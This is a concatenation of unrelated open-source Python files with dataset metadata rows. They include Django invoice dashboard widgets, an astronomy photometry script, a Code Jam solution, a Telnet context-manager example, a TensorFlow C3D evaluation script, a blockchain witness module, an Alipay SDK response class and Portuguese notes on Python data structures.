    # label and series
    values_list = ("month", "total")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    # Only invoices settled in cash, grouped and summed by creation month.
    queryset = (
        Invoice.objects.filter(balancetype="Cash")
        .annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(total=Sum("balance"))
    )
    # limit_to = 10

    def legend(self):
        # Displays labels in legend
        return [x for x, y in self.values]
class Invoice_metal_value(widgets.SingleBarChart):
    """Bar chart widget: total balance of metal-type invoices per month.

    NOTE(review): unlike Invoice_cash_value this widget defines no
    ``legend`` method — confirm whether that asymmetry is intentional.
    """

    # label and series
    values_list = ("month", "total")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    # Only invoices settled in metal, grouped and summed by creation month.
    queryset = (
        Invoice.objects.filter(balancetype="Metal")
        .annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(total=Sum("balance"))
    )
    # limit_to = 10
class MyDash(Dashboard):
    """Control-center dashboard bundling the invoice widgets defined above."""

    widgets = (InvList, Invoice_count, Invoice_cash_value, Invoice_metal_value)
| [
"[email protected]"
]
| |
8541223ee9f41ea6a340339066aea93077edc297 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.py | d7551b1104f4f2bde286e2ba13e3fff4fae60a31 | []
| no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
    """Run gAperture NUV photometry for sdB_sdssj_163723.59+311304.4."""
    photometry_args = dict(
        band="NUV",
        skypos=[249.348292, 31.217889],
        stepsz=30.,
        csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.csv",
        maxgap=1000.,
        overwrite=True,
        radius=0.00555556,
        annulus=[0.005972227, 0.0103888972],
        verbose=3,
    )
    gAperture(**photometry_args)

if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
07ab7a01d4a5fca02f2117dc9fa9530abe06a1bb | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_sentinel_B.py | a41cfb9d61b9bf2318a0b766282b89ad303786f1 | []
| no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 833 | py | import sys
def flip(inStr, end):
    """Return a copy of inStr with characters 0..end toggled '+' <-> '-'.

    Characters after position *end* (including any trailing newline) are
    kept unchanged.  Uses range/join instead of the Python-2-only xrange
    and per-index list mutation, so it runs under both Python 2 and 3.
    """
    toggled = ['+' if ch == '-' else '-' for ch in inStr[:end + 1]]
    return "".join(toggled) + inStr[end + 1:]
def processRecord(inStr):
    """Return the minimum number of prefix flips to make every pancake '+'.

    The greedy strategy (flip the prefix ending at the last '-') performs
    one flip per boundary between unequal adjacent characters, plus one
    final flip if the stack ends with '-'.  Counting those directly is
    O(n), replacing the O(n^2) repeated-flip simulation, and gives the
    same result.  Works under both Python 2 and 3; trailing whitespace
    from fp.readline() is ignored.
    """
    stack = inStr.strip()
    if not stack:
        return 0
    flips = sum(1 for a, b in zip(stack, stack[1:]) if a != b)
    if stack[-1] == '-':
        flips += 1
    return flips
def processLine(fp, x):
    """Read one record from *fp* and print the answer for case number *x*.

    Uses the single-argument ``print(...)`` call form, which behaves
    identically under Python 2 (parenthesized expression) and Python 3.
    """
    result = processRecord(fp.readline())
    print('Case #{}: {}'.format(x, result))
def main():
    """Entry point: read the case count from argv[1], then solve each case.

    Fixes over the original: the ``with`` statement closes the file even
    when a case raises (the old ``fp.close()`` was skipped on error);
    ``print(e)`` works on Python 2 and 3; a bare ``raise`` re-raises the
    original exception without rewriting its traceback.
    """
    filename = sys.argv[1]
    try:
        with open(filename) as fp:
            records = int(fp.readline())
            for x in range(records):
                processLine(fp, x + 1)
    except Exception as e:
        print(e)
        raise

if __name__ == '__main__':
    main()
| [
"[[email protected]]"
]
| |
fdb4b8beb6788367b69cf674f43dbed29e7f26ed | 0b5be4b9162c19cf0d98972e52ce80aa8af47f0a | /High_Level_Coding_python3/7/7_3.py | 00a2b2d5a943d5ec99617a57f6fa2a786190cb36 | []
| no_license | Air-Zhuang/Test35 | 374c974a2a7693fff21be81278c1bb59a050f7ee | d9f92b7a025c91b7503f02afc896ac769f818a84 | refs/heads/master | 2021-06-19T12:36:13.383878 | 2019-09-21T08:02:43 | 2019-09-21T08:02:43 | 147,629,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | '''
实现类似with的让对象支持上下文管理
'''
'''
实现上下文管理协议,需定义实例的__enter__,__exit__
方法,他们分别在with开始和结束时被调用
'''
from sys import stdin, stdout
import getpass
import telnetlib
from collections import deque
class TelnetClient:
def __init__(self, host, port=23):
self.host = host
self.port = port
def __enter__(self):
self.tn = telnetlib.Telnet(self.host, self.port)
self.history = deque([])
return self #这里要返回值
def __exit__(self, exc_type, exc_value, exc_tb):
print('IN __exit__', exc_type, exc_value, exc_tb)
self.tn.close()
self.tn = None
with open('history.txt', 'a') as f:
f.writelines(self.history)
return True
def login(self):
# user
self.tn.read_until(b"login: ")
user = input("Enter your remote account: ")
self.tn.write(user.encode('utf8') + b"\n")
# password
self.tn.read_until(b"Password: ")
password = getpass.getpass()
self.tn.write(password.encode('utf8') + b"\n")
out = self.tn.read_until(b'$ ')
stdout.write(out.decode('utf8'))
def interact(self):
while True:
cmd = stdin.readline()
if not cmd:
break
self.history.append(cmd)
self.tn.write(cmd.encode('utf8'))
out = self.tn.read_until(b'$ ').decode('utf8')
stdout.write(out[len(cmd)+1:])
stdout.flush()
# client = TelnetClient('192.168.0.105')
# client.connect()
# client.login()
# client.interact()
# client.cleanup()
with TelnetClient('192.168.0.105') as client:
raise Exception('TEST')
client.login()
client.interact()
print('END')
| [
"[email protected]"
]
| |
e13861ef225236bfe4712ae37af04bc652f4bb50 | 1caa4080e82a6b18f7c2e52fea25b4e66c0b331b | /C3D-tensorflow-master/lstm.py | c46aa01205fcfec6f0b76e847fdc804da1a3c1e3 | []
| no_license | xixiareone/ouyangruo | 18dd0ae00e54f96ed3f61cd303f486c3c9c84de7 | 7605dbac97ed7ceeef92c14622aa0d7defb52bee | refs/heads/master | 2021-01-21T13:34:33.276346 | 2019-06-18T07:25:21 | 2019-06-18T07:25:21 | 40,350,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,509 | py | #!/usr/bin/env python
"""Evaluates the C3D network"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import math
import time
import tensorflow as tf
import numpy as np
import c3d_feature
import input_data
# Basic model parameters as external flags.
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('gpu_num', 1,
"""How many GPUs to use""")
tf.app.flags.DEFINE_integer('batch_size', 10,
"""Batch size.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,
"""How often to run the eval.""")
tf.app.flags.DEFINE_string('checkpoint_dir', 'result',
"""Check point directory.""")
tf.app.flags.DEFINE_boolean('run_once', True,
"""Whether to run eval only once.""")
tf.app.flags.DEFINE_integer('num_examples', 5000,
"""Number of examples to run.""")
def placeholder_inputs(batch_size):
"""Generate placeholder variables to represent the input tensors.
These placeholders are used as inputs by the rest of the model building
code and will be fed from the downloaded data in the .run() loop, below.
Args:
batch_size: The batch size will be baked into both placeholders.
Returns:
images_placeholder: Images placeholder.
labels_placeholder: Labels placeholder.
"""
# Note that the shapes of the placeholders match the shapes of the full
# image and label tensors, except the first dimension is now batch_size
# rather than the full size of the train or test data sets.
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
c3d_feature.NUM_FRAMES_PER_CLIP,
c3d_feature.CROP_SIZE,
c3d_feature.CROP_SIZE,
c3d_feature.CHANNELS))
labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
return images_placeholder, labels_placeholder
def eval_once(saver, top_k_op, images_placeholder,
labels_placeholder):
"""Run Eval once.
Args:
saver: Saver.
top_k_op: Top K op.
"""
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# Assuming model_checkpoint_path looks something like:
# /my-favorite-path/cifar10_train/model.ckpt-0,
# extract global_step from it.
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
else:
print('No checkpoint file found')
return
# Start the queue runners.
coord = tf.train.Coordinator()
try:
threads = []
for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
start=True))
num_iter = int(math.ceil(FLAGS.num_examples / FLAGS.batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * FLAGS.batch_size
step = 0
while step < num_iter and not coord.should_stop():
eval_images, eval_labels, _, _, _ = input_data.read_clip_and_label(
filename='list/test.list',
batch_size=FLAGS.batch_size,
num_frames_per_clip=c3d_feature.NUM_FRAMES_PER_CLIP,
crop_size=c3d_feature.CROP_SIZE,
shuffle=True)
predictions = sess.run([top_k_op],
feed_dict={
images_placeholder: eval_images,
labels_placeholder: eval_labels})
true_count += np.sum(predictions)
step += 1
if step % 10 == 0:
print("%i/100" % int(step/num_iter))
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
coord.request_stop()
coord.join(threads, stop_grace_period_secs=10)
def evaluate():
with tf.Graph().as_default() as g:
# Get the image and the labels placeholder
images_placeholder, labels_placeholder = placeholder_inputs(FLAGS.batch_size)
# Build the Graph that computes the logits predictions from the inference
# model.
with tf.variable_scope('c3d_var'):
logits = c3d_feature.inference_c3d(images_placeholder)
top_k_op = tf.nn.in_top_k(logits, labels_placeholder, 1)
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(
c3d_feature.MOVING_AVERAGE_DECAY)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
while True:
eval_once(saver, top_k_op, images_placeholder, labels_placeholder)
if FLAGS.run_once:
break
time.sleep(FLAGS.eval_interval_secs)
def main(_):
evaluate()
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
]
| |
04f1ca1c36019f37f910e36c383332a9c75eed8c | a22cc323b29f50da397d8363ac2521e3542a0fd7 | /dpaycli/witness.py | d1aea67432b47c9dfcfca1603775a20e8c24aa4a | [
"MIT"
]
| permissive | dpays/dpay-cli | 1a58c7dae45218e3b05b7e17ff5ce03e918d27b9 | dfa80898e1faea2cee92ebec6fe04873381bd40f | refs/heads/master | 2020-04-01T09:26:43.200933 | 2018-10-15T08:03:06 | 2018-10-15T08:03:06 | 153,075,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,321 | py | # This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import json
from dpaycli.instance import shared_dpay_instance
from dpaycligraphenebase.py23 import bytes_types, integer_types, string_types, text_type
from .account import Account
from .amount import Amount
from .exceptions import WitnessDoesNotExistsException
from .blockchainobject import BlockchainObject
from .utils import formatTimeString
from datetime import datetime, timedelta, date
from dpayclibase import transactions, operations
from dpaycligraphenebase.account import PrivateKey, PublicKey
import pytz
from prettytable import PrettyTable
class Witness(BlockchainObject):
""" Read data about a witness in the chain
:param str account_name: Name of the witness
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import Witness
>>> Witness("gtg")
<Witness gtg>
"""
type_id = 3
def __init__(
self,
owner,
full=False,
lazy=False,
dpay_instance=None
):
self.full = full
self.lazy = lazy
self.dpay = dpay_instance or shared_dpay_instance()
if isinstance(owner, dict):
owner = self._parse_json_data(owner)
super(Witness, self).__init__(
owner,
lazy=lazy,
full=full,
id_item="owner",
dpay_instance=dpay_instance
)
def refresh(self):
if not self.identifier:
return
if not self.dpay.is_connected():
return
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
witness = self.dpay.rpc.find_witnesses({'owners': [self.identifier]}, api="database")['witnesses']
if len(witness) > 0:
witness = witness[0]
else:
witness = self.dpay.rpc.get_witness_by_account(self.identifier)
if not witness:
raise WitnessDoesNotExistsException(self.identifier)
witness = self._parse_json_data(witness)
super(Witness, self).__init__(witness, id_item="owner", lazy=self.lazy, full=self.full, dpay_instance=self.dpay)
def _parse_json_data(self, witness):
parse_times = [
"created", "last_bbd_exchange_update", "hardfork_time_vote",
]
for p in parse_times:
if p in witness and isinstance(witness.get(p), string_types):
witness[p] = formatTimeString(witness.get(p, "1970-01-01T00:00:00"))
parse_int = [
"votes", "virtual_last_update", "virtual_position", "virtual_scheduled_time",
]
for p in parse_int:
if p in witness and isinstance(witness.get(p), string_types):
witness[p] = int(witness.get(p, "0"))
return witness
def json(self):
output = self.copy()
parse_times = [
"created", "last_bbd_exchange_update", "hardfork_time_vote",
]
for p in parse_times:
if p in output:
p_date = output.get(p, datetime(1970, 1, 1, 0, 0))
if isinstance(p_date, (datetime, date)):
output[p] = formatTimeString(p_date)
else:
output[p] = p_date
parse_int = [
"votes", "virtual_last_update", "virtual_position", "virtual_scheduled_time",
]
for p in parse_int:
if p in output and isinstance(output[p], integer_types):
output[p] = str(output[p])
return json.loads(str(json.dumps(output)))
@property
def account(self):
return Account(self["owner"], dpay_instance=self.dpay)
@property
def is_active(self):
return len(self['signing_key']) > 3 and self['signing_key'][3:] != '1111111111111111111111111111111114T1Anm'
def feed_publish(self,
base,
quote=None,
account=None):
""" Publish a feed price as a witness.
:param float base: USD Price of BEX in BBD (implied price)
:param float quote: (optional) Quote Price. Should be 1.000 (default), unless
we are adjusting the feed to support the peg.
:param str account: (optional) the source account for the transfer
if not self["owner"]
"""
quote = quote if quote is not None else "1.000 %s" % (self.dpay.symbol)
if not account:
account = self["owner"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, dpay_instance=self.dpay)
if isinstance(base, Amount):
base = Amount(base, dpay_instance=self.dpay)
elif isinstance(base, string_types):
base = Amount(base, dpay_instance=self.dpay)
else:
base = Amount(base, self.dpay.bbd_symbol, dpay_instance=self.dpay)
if isinstance(quote, Amount):
quote = Amount(quote, dpay_instance=self.dpay)
elif isinstance(quote, string_types):
quote = Amount(quote, dpay_instance=self.dpay)
else:
quote = Amount(quote, self.dpay.dpay_symbol, dpay_instance=self.dpay)
if not base.symbol == self.dpay.bbd_symbol:
raise AssertionError()
if not quote.symbol == self.dpay.dpay_symbol:
raise AssertionError()
op = operations.Feed_publish(
**{
"publisher": account["name"],
"exchange_rate": {
"base": base,
"quote": quote,
},
"prefix": self.dpay.prefix,
})
return self.dpay.finalizeOp(op, account, "active")
def update(self, signing_key, url, props, account=None):
""" Update witness
:param pubkey signing_key: Signing key
:param str url: URL
:param dict props: Properties
:param str account: (optional) witness account name
Properties:::
{
"account_creation_fee": x,
"maximum_block_size": x,
"bbd_interest_rate": x,
}
"""
if not account:
account = self["owner"]
return self.dpay.witness_update(signing_key, url, props, account=account)
class WitnessesObject(list):
def printAsTable(self, sort_key="votes", reverse=True, return_str=False, **kwargs):
utc = pytz.timezone('UTC')
table_header = ["Name", "Votes [PV]", "Disabled", "Missed", "Feed base", "Feed quote", "Feed update", "Fee", "Size", "Interest", "Version"]
t = PrettyTable(table_header)
t.align = "l"
if sort_key == 'base':
sortedList = sorted(self, key=lambda self: self['bbd_exchange_rate']['base'], reverse=reverse)
elif sort_key == 'quote':
sortedList = sorted(self, key=lambda self: self['bbd_exchange_rate']['quote'], reverse=reverse)
elif sort_key == 'last_bbd_exchange_update':
sortedList = sorted(self, key=lambda self: (utc.localize(datetime.utcnow()) - self['last_bbd_exchange_update']).total_seconds(), reverse=reverse)
elif sort_key == 'account_creation_fee':
sortedList = sorted(self, key=lambda self: self['props']['account_creation_fee'], reverse=reverse)
elif sort_key == 'bbd_interest_rate':
sortedList = sorted(self, key=lambda self: self['props']['bbd_interest_rate'], reverse=reverse)
elif sort_key == 'maximum_block_size':
sortedList = sorted(self, key=lambda self: self['props']['maximum_block_size'], reverse=reverse)
elif sort_key == 'votes':
sortedList = sorted(self, key=lambda self: int(self[sort_key]), reverse=reverse)
else:
sortedList = sorted(self, key=lambda self: self[sort_key], reverse=reverse)
for witness in sortedList:
td = utc.localize(datetime.utcnow()) - witness['last_bbd_exchange_update']
disabled = ""
if not witness.is_active:
disabled = "yes"
t.add_row([witness['owner'],
str(round(int(witness['votes']) / 1e15, 2)),
disabled,
str(witness['total_missed']),
str(Amount(witness['bbd_exchange_rate']['base'], dpay_instance=self.dpay)),
str(Amount(witness['bbd_exchange_rate']['quote'], dpay_instance=self.dpay)),
str(td.days) + " days " + str(td.seconds // 3600) + ":" + str((td.seconds // 60) % 60),
str(witness['props']['account_creation_fee']),
str(witness['props']['maximum_block_size']),
str(witness['props']['bbd_interest_rate'] / 100) + " %",
witness['running_version']])
if return_str:
return t.get_string(**kwargs)
else:
print(t.get_string(**kwargs))
def get_votes_sum(self):
vote_sum = 0
for witness in self:
vote_sum += int(witness['votes'])
return vote_sum
def __contains__(self, item):
from .account import Account
if isinstance(item, Account):
name = item["name"]
elif self.dpay:
account = Account(item, dpay_instance=self.dpay)
name = account["name"]
return (
any([name == x["owner"] for x in self])
)
def __str__(self):
return self.printAsTable(return_str=True)
def __repr__(self):
return "<%s %s>" % (
self.__class__.__name__, str(self.identifier))
class Witnesses(WitnessesObject):
""" Obtain a list of **active** witnesses and the current schedule
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import Witnesses
>>> Witnesses()
<Witnesses >
"""
def __init__(self, lazy=False, full=True, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.lazy = lazy
self.full = full
self.refresh()
def refresh(self):
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
self.active_witnessess = self.dpay.rpc.get_active_witnesses(api="database")['witnesses']
self.schedule = self.dpay.rpc.get_witness_schedule(api="database")
self.witness_count = self.dpay.rpc.get_witness_count(api="condenser")
else:
self.active_witnessess = self.dpay.rpc.get_active_witnesses()
self.schedule = self.dpay.rpc.get_witness_schedule()
self.witness_count = self.dpay.rpc.get_witness_count()
self.current_witness = self.dpay.get_dynamic_global_properties(use_stored_data=False)["current_witness"]
self.identifier = ""
super(Witnesses, self).__init__(
[
Witness(x, lazy=self.lazy, full=self.full, dpay_instance=self.dpay)
for x in self.active_witnessess
]
)
class WitnessesVotedByAccount(WitnessesObject):
""" Obtain a list of witnesses which have been voted by an account
:param str account: Account name
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import WitnessesVotedByAccount
>>> WitnessesVotedByAccount("gtg")
<WitnessesVotedByAccount gtg>
"""
def __init__(self, account, lazy=False, full=True, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.account = Account(account, full=True, dpay_instance=self.dpay)
account_name = self.account["name"]
self.identifier = account_name
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
if "witnesses_voted_for" not in self.account:
return
limit = self.account["witnesses_voted_for"]
witnessess_dict = self.dpay.rpc.list_witness_votes({'start': [account_name], 'limit': limit, 'order': 'by_account_witness'}, api="database")['votes']
witnessess = []
for w in witnessess_dict:
witnessess.append(w["witness"])
else:
if "witness_votes" not in self.account:
return
witnessess = self.account["witness_votes"]
super(WitnessesVotedByAccount, self).__init__(
[
Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay)
for x in witnessess
]
)
class WitnessesRankedByVote(WitnessesObject):
""" Obtain a list of witnesses ranked by Vote
:param str from_account: Witness name from which the lists starts (default = "")
:param int limit: Limits the number of shown witnesses (default = 100)
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import WitnessesRankedByVote
>>> WitnessesRankedByVote(limit=100)
<WitnessesRankedByVote >
"""
def __init__(self, from_account="", limit=100, lazy=False, full=False, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
witnessList = []
last_limit = limit
self.identifier = ""
use_condenser = True
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase() and not use_condenser:
query_limit = 1000
else:
query_limit = 100
if self.dpay.rpc.get_use_appbase() and not use_condenser and from_account == "":
last_account = None
elif self.dpay.rpc.get_use_appbase() and not use_condenser:
last_account = Witness(from_account, dpay_instance=self.dpay)["votes"]
else:
last_account = from_account
if limit > query_limit:
while last_limit > query_limit:
tmpList = WitnessesRankedByVote(last_account, query_limit)
if (last_limit < limit):
witnessList.extend(tmpList[1:])
last_limit -= query_limit - 1
else:
witnessList.extend(tmpList)
last_limit -= query_limit
if self.dpay.rpc.get_use_appbase():
last_account = witnessList[-1]["votes"]
else:
last_account = witnessList[-1]["owner"]
if (last_limit < limit):
last_limit += 1
if self.dpay.rpc.get_use_appbase() and not use_condenser:
witnessess = self.dpay.rpc.list_witnesses({'start': [last_account], 'limit': last_limit, 'order': 'by_vote_name'}, api="database")['witnesses']
elif self.dpay.rpc.get_use_appbase() and use_condenser:
witnessess = self.dpay.rpc.get_witnesses_by_vote(last_account, last_limit, api="condenser")
else:
witnessess = self.dpay.rpc.get_witnesses_by_vote(last_account, last_limit)
# self.witness_count = len(self.voted_witnessess)
if (last_limit < limit):
witnessess = witnessess[1:]
if len(witnessess) > 0:
for x in witnessess:
witnessList.append(Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay))
if len(witnessList) == 0:
return
super(WitnessesRankedByVote, self).__init__(witnessList)
class ListWitnesses(WitnessesObject):
""" List witnesses ranked by name
:param str from_account: Witness name from which the lists starts (default = "")
:param int limit: Limits the number of shown witnesses (default = 100)
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import ListWitnesses
>>> ListWitnesses(from_account="gtg", limit=100)
<ListWitnesses gtg>
"""
def __init__(self, from_account="", limit=100, lazy=False, full=False, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.identifier = from_account
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
witnessess = self.dpay.rpc.list_witnesses({'start': from_account, 'limit': limit, 'order': 'by_name'}, api="database")['witnesses']
else:
witnessess = self.dpay.rpc.lookup_witness_accounts(from_account, limit)
if len(witnessess) == 0:
return
super(ListWitnesses, self).__init__(
[
Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay)
for x in witnessess
]
)
| [
"[email protected]"
]
| |
59bdae501fd433ab656acdf1e66228192742d2a8 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/refactoring/inlineFunction/alreadyImported/main.after.py | 3e9e96b979cc28cb9af71a1be22c835a9fd5a934 | [
"Apache-2.0"
]
| permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 56 | py | from src import bar
x = bar(1)
y = bar(2)
res = 2 + y | [
"[email protected]"
]
| |
f94d8cdd200a2667c1805cec6a55df31c3973965 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayBossFncAntbudgetReturnResponse.py | 3836054a78a576ebfb9a36c10cf8e6cab2ecc400 | [
"Apache-2.0"
]
| permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.BizActionLogDTO import BizActionLogDTO
class AlipayBossFncAntbudgetReturnResponse(AlipayResponse):
    """Response object for the alipay.boss.fnc.antbudget.return API.

    Exposes the parsed gateway payload through two attributes:
      * result_data -- a BizActionLogDTO describing the budget-return action
      * result_msg  -- the plain-text result message
    """

    def __init__(self):
        super(AlipayBossFncAntbudgetReturnResponse, self).__init__()
        self._result_data = None
        self._result_msg = None

    @property
    def result_data(self):
        return self._result_data

    @result_data.setter
    def result_data(self, value):
        # Accept either a ready-made DTO instance or a raw dict payload
        # straight from the gateway response.
        if not isinstance(value, BizActionLogDTO):
            value = BizActionLogDTO.from_alipay_dict(value)
        self._result_data = value

    @property
    def result_msg(self):
        return self._result_msg

    @result_msg.setter
    def result_msg(self, value):
        self._result_msg = value

    def parse_response_content(self, response_content):
        # Let the base class decode the raw payload, then copy over the
        # fields this API defines, but only when they are actually present.
        response = super(AlipayBossFncAntbudgetReturnResponse, self).parse_response_content(response_content)
        for field in ('result_data', 'result_msg'):
            if field in response:
                setattr(self, field, response[field])
| [
"[email protected]"
]
| |
13979bc36eda56037d981c8724576dc7b10b6db5 | 7bb9bd2bdadef1590b2ef7ff309e08abf454e49d | /Resolução de problemas II/ListasTuplasDeicionários.py | 8665bcc291cd1e736c9ae453965659f17ca9745c | []
| no_license | ALREstevam/Curso-de-Python-e-Programacao-com-Python | afdf12717a710f20d4513d5df375ba63ba1e1c19 | af6227376736e63810e5979be54eb1c433d669ac | refs/heads/master | 2021-09-07T12:11:17.158298 | 2018-02-22T17:47:19 | 2018-02-22T17:47:19 | 87,453,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | '''
Arrays são chamados de sequências
Tipos
String
s = 'texto'
Lista
            São elementos mutáveis
Podem ter elementos de diferentes tipos
l = ['asa', 1]
Tupla
t = (1, 2, 3)
Tuplas e strings não são mutáveis
Mapping (relacionam chave ao valor)
Acesso
Com números positivos e negativos
0 1 2 3
[] [] [] []
-1 -2 -3 -4
Úteis
aList = []
for number in range(1,11):
aList += [number] #Adiciona elementos na listas
#Os dois elementos são listas
print(aList)
==============================================================
#Via elemento
for item in aList:
print(item) #imprime todos os elementos da lista
#Via índice
for i in range(len(aList)):
print(aList[i]) #imprime todos os elementos da lista
===============================================================
Histograma
values = [0] * 10 # cria uma lista com 10 valores iguais a zero
print('10 inteiros')
for i in range(10):
newValue = int(input('Valor: '))
for i in range(len(values)):
print(values[i] * '*')
==============================================================
Tuplas - lista que não pode ser mudada
currentHour = hour, minute, second
print(currentTime[0])
===============================================================
Desempacotar sequências
aString = 'abc'
first, second, third = aString
===============================================================
Slicing
sequencia[inicio : ]
sequencia[inicio : fim]
sequencia[ : fim]
sequencia[inicio : incremento : fim]
até fim-1
===============================================================
Dicionários
Coleção de valores associativos
Chave -> valor
dictionart = {}
dictionary = {1 : 'one', 2 : 'two'}
> Manipulando
nums = {1 : 'one', 2 : 'two'}
        nums[3] = 'three'       #adiciona ao dicionário
del nums[3] #removendo 3
nums[1] = 'ones' #alterando valor
===============================================================
Métodos = lista, tupla, dicionário (built-in types)
append(item) Insere item no final da lista
count( elemento ) Retorna o número de ocorrencias de elemento na lista.
extend( newList ) Insere os elementos de newList no final da lista
index( elemento ) Returna o indice da primeira ocorrência de elemento na lista
insert( indice, item ) Insere item na posição indice
pop( [indice] ) Sem parametro – remove e retorna o último elemento da lista. Se indice é especificado, remove e retorna o elemento na posição indice.
remove( elemento ) Remove a primeira ocorrencia de elemento da lista.
reverse() Inverte o conteúdo da lista
sort( [function] ) Ordena o conteúdo da lista.
===============================================================
    Métodos de dicionário
clear() Apaga todos os item do dicionário
copy() Cria uma cópia do dicionário. Cópia referencia o dicionário original
get( key [, returnValue] ) Retorna o valor associado à chave. Se chave não está no dicionário e returnValue é dado, retorna-o.
has_key( key ) Returna 1 se a chave está no dicionário; 0 se não está.
items() Retorna uma lista de tuplas no formato chave-valor.
keys() Retorna uma lista das chaves do dicionário.
popitem() Remove e retorna um par arbitrário como uma tupla de dois elementos.
setdefault( key [,value] ) Se key não está no dicionário e value é especificado, insere o par key-value. Se value não é especificado, value é None.
update( newDictionary ) Adiciona todos pares chave-valor de newDictionary ao dicionário corrente e sobrescreve os valores para as chaves ja existentes.
values() Retorna uma lista de valores no dicionário.
for key in dicionario.keys():
from copy import deepcopy
copiaDistinta = deepcopy(dictionary)
'''
# Demonstration of list.remove(): deletes the first occurrence of the value.
# NOTE(review): binding to the name "list" shadows the built-in list type;
# prefer a different name (e.g. "letters") in real code.
list = ['a','b','c']
list.remove('a')
